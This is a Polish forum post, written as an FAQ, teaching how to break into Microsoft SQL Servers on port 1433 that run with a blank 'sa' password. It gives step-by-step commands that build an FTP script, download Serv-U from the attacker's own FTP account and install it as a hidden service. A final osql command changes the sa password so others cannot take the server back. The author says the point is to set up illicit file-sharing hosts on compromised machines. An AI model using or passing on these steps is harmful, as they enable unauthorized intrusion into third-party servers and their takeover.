[FAQ] Hack SQL (p:1433)

Destro86

Użytkownik
Dołączył
Maj 25, 2006
Posty
11
Na wstępie przepraszam jeśli dział jest zły
<


1433 SQL

Hack SqL (Port: 1433)

1. Wstępniak:
Jest to FaQ o hacku SqL Pass - port 1433. Będzie on oparty na jednym programie i paru komendach .

2. Co jest potrzebne:
- Scan portu 1433 (Sprawdzony)
- SQLExec.exe (Progs do wysyłania komend do Server'a)
- Program ServuDaemon + config (Pliki ServuDaemon.ini)
- Konto na jakims serwerze FTP (np: Lycos)
- Brain (Looknij do słowika Eng-Pol)

3. Łaczymy Się z Serverem:
Przypuszczalnie Moj server do ktorego chce sie podłaczyc jest taki:
IP: 128.1.0.0 | User: sa | Hasło: NULL (Czyli Puste)
- Otwierasz SQLExec
- W pola wpisujesz:
Host: 128.1.0.0
User: sa
Pass: (Na przykładzie pozostawiamy puste)

- I Connect
- Jeśli nie wyskoczy SQL ERROR, a lista plików na C: jestśmy w domu ;]

4. HackSqL Pass:
- Przed przystąpieniem do wgrywania plików na Przyszłego Stro'sa, Musimy je umieścic na jakiś serverze z którego będziemy je ściagac. Pokaże to na przykładzie Lycos'a. Czyli najpierw załuż tam swoje konto ( www.tripod.lycos.co.uk ). Gdy załozysz na FTP wrzucasz ServUDaemon.exe i ServuDaemon.ini.
- Teraz po koleji wklejasz linijki: (potwierdzajac każda nowo wkeljona ENTER'EM i uzupełniajac danymi dwojego konta)
echo open IP_SERVERA PORT >> C:exec.gp | np: 212.78.204.213 21 |
echo LOGIN >> C:exec.gp |<- Wpisz swój Login |
echo HASŁO >> C:exec.gp |<- Wpisz swoje Hasło |
echo get ServUDaemon.exe >> C:exec.gp
echo get ServUDaemon.ini >> C:exec.gp
echo QUIT >> C:exec.gp
ftp -s:C:exec.gp |<- To spowoduje ściagniecie plików|
del C:exec.gp

- Jeśli wszystko będzie ok. Pliki sciągna sie do domyślnego katalogu Windowsa (C:Winsowssystem32 lub C:WinNTsystem32)
- Jesli pliki się tam znajdują wystarczy teraz uruchomić ServU ;] Wysyłasz komende:
c:Windowssystem32ServUDaemon.exe /i/s/h
NET START Serv-U LUB NET START Serv-U FTP Server

- No i to by było na tyle. Powinno wszystko dzialać.

5. Zabezpieczanie:
- Po pierwsze to zmienic nazwe ServuDaemon.exe na jakas inna np winexe.exe. Czasem nie zmieniac zawy pliku ServuDaemon.ini bo program nie bedzie działac.
Tutaj jest komenda jaka zmienisz domyślne hasło aby nikt nie rehackna. Jeśli nie ma OSQL na serverze bedziesz musiał go ściagnac na niego!
@osql -U sa -P -Q "sp_password NULL , nowehaslo , sa"
@exit

Tutek raczej przeznaczony dla osob ktore chca stawiac strosy
smile.gif
ale oczywiscie mozna tez wykorzystac do innych celow
<
 
Do góry Bottom